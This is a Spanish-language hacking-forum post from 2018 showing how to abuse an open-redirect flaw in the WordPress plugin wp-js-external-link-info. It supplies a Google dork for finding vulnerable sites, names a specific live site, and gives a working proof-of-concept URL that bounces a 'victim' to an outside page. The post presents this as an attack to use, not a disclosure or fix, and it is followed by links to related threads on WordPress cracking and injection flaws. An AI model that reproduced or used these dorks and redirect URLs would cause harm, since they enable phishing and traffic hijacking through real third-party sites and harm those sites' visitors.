Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Wordpress wp-js-external-link-info | Redireccionamiento

  • 0 Respuestas
  • 2743 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Drok3r

  • *
  • Underc0der
  • Mensajes: 48
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
    • RedBird
  • Twitter: @drok3r
« en: Mayo 12, 2018, 07:46:32 pm »
Algunos sitios que trabajan bajo el CMS de Wordpress, utilizan un plugin llamado wp-js-external-link-info y aunque actualmente ha sido cerrado, algunos sitios aun lo tienen, y nos podemos aprovechar de este plugin para redirigir a una víctima de un sitio a otro.

Para poder hacer esto, utilizaremos el siguiente dork:

inurl:/wp-content/plugins/wp-js-external-link-info/redirect.php?url=

El cual a grandes rasgos realiza una búsqueda de sitios, los cuales tengan en su URL el contenido indicado, en este caso el plugin wp-js-external-link-info.
De acuerdo a google tenemos alrededor de unos 137000 resultados que coinciden con nuestra búsqueda.

Lo importante es la URL, que en este caso es:

http://www.muenchen-international.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=

después del parámetro url debemos ingresar el link del sitio al que nosotros queramos redirigir a la víctima. por ejemplo

http://www.muenchen-international.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://r3dbird.blogspot.mx[/font][/b]

Y en cuestión de segundos, la victima sera redirigida a otro sitio.

PoC
http://www.muenchen-international.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://r3dbird.blogspot.mx


Mas informacion de plugin wp js external link info:

ttps://wpvulndb.com/plugins/wp-js-external-link-info

 

¿Te gustó el post? COMPARTILO!



Ataque de diccionario cracking CMS Wordpress/Joomla Backtrack5r2 (Hacking/Deface

Iniciado por andrewtwo

Respuestas: 0
Vistas: 2273
Último mensaje Septiembre 02, 2012, 02:12:40 am
por andrewtwo
WordPress Wordfence Firewall 5.1.2 Cross Site Scripting Vulnerability

Iniciado por Mayk0

Respuestas: 0
Vistas: 2341
Último mensaje Noviembre 07, 2014, 01:55:54 pm
por Mayk0
Flunym0us 2.0 - Escáner de vulnerabilidades para WordPress y Moodle

Iniciado por Pr0ph3t

Respuestas: 2
Vistas: 2990
Último mensaje Octubre 10, 2012, 12:57:40 pm
por Pr0ph3t
Los 3 modos más comunes de hackear WordPress y cómo evitarlo

Iniciado por Hackmundy

Respuestas: 2
Vistas: 6592
Último mensaje Marzo 06, 2013, 01:15:42 am
por b166er
Wordpress Business Intelligence Plugin - SQL injection

Iniciado por Mayk0

Respuestas: 0
Vistas: 2174
Último mensaje Abril 06, 2015, 12:16:18 am
por Mayk0